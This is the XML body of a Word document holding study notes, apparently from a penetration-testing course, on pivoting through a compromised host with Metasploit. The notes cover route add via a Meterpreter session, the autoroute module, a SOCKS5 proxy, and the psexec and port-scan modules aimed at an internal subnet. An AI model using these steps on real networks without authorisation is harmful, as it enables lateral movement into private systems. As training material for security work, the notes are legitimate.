                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B62">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="420"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B63">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="420"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">route add 172.16.5.0/24 12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="420"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">12 is the session ID of the Meterpreter session that has access to the target network 172.16.5.0/24. You're telling Metasploit to route packets destined for that subnet through session 12.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B65">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="420"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">route print</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B66">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B67">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">What this does is it tells Metasploit that we can access the 172 subnet through session 12, which means it adds routes to Metasploit’s routing table. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B68">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Without route add: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you tried to run a Metasploit auxiliary module (like a port scanner or SMB enum module) with RHOSTS=172.16.5.200, Metasploit would try to connect to that IP directly from your attack machine (e.g., Kali). But your Kali box is on the 192.168.119.x or 192.168.50.x subnet and cannot reach the 172.16.5.x network directly — the packets would go nowhere.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B69">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B6A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With a path created to the internal network, we can enumerate this subnet. Now we could scan the whole network for live hosts with a port scan auxiliary module. Since this scan would take quite some time to complete, let's shorten this step by only scanning the other live host in the second network. Therefore, instead of setting the value of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RHOSTS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.16.5.0/24</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as we would do if we wanted to scan the whole network, we set it to 172.16.5.200. For now, we only want to scan ports 445 and 3389.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B6B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B6C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They proceeded to use tools like</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">auxiliary/scanner/portscan/tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B6E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit/windows/smb/psexec</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B6F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B70">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">You can use the command </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">route flush</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to remove all routes from metasploit's routing table, and run "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">route print</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" to confirm everything is gone</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B71">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B72">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_5wnzbishiejg" w:id="97"/>
      <w:bookmarkEnd w:id="97"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">multi/manage/autoroute</w:t>
      </w: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t xml:space="preserve">Instead of manually adding subnets to Metasploit routing table, you can instead use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">multi/manage/autoroute </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">module to automatically scan for ALL the subnets that the victim machine is in (the machine that meterpreter is in). </w:t>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t xml:space="preserve">Next, let's activate the module multi/manage/autoroute in which we must set the session ID as value for the option SESSION. Then, let's enter run to launch the module.</w:t>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5369320" cy="6367463"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="538" name="image529.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image529.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId240"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5369320" cy="6367463"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1078"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use multi/manage/autoroute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B7A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1078"/>
        </w:numPr>
        <w:ind w:left="72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B7B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1078"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sessions -l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1078"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set session 12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B7D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1078"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This means the compromised machine is on session 12, the one on the 172 subnet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B7E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1078"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B7F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B80">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Listing 80 shows that autoroute added </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">172.16.5.0/24</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the routing table (as well as the 192 subnet since the compromised machine is dual-homed)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B81">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B82">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fh6gn0ayqpx9" w:id="98"/>
      <w:bookmarkEnd w:id="98"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using SOCKS proxy in Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B83">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note that we can use SOCKS proxy along with either the "Route Add" method or the "multi/manage/autoroute" method, since they both do the same job of adding to Metasploit's Routing Table, which allow tools like SOCKS5 in Metasploit to be usable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B84">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B85">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We could now use the psexec module as we did before,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> but we can also combine routes with the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">server/socks_proxy auxiliary </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">module to configure a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SOCKS proxy</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This allows applications outside of the Metasploit Framework to tunnel through the pivot on port 1080 by default.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B86">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B87">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We set the option SRVHOST to 127.0.0.1 and VERSION to 5 in order to use SOCKS version 5.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B88">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B89">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4510144" cy="4300538"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6" name="image5.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image5.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId241"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4510144" cy="4300538"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B8A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use auxiliary/server/socks_proxy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B8B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">show options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B8C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set SRVHOST 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B8D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">set VERSION 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B8E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="263"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This specifies using SOCKS5 as the version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000B8F">
      <w:pPr>
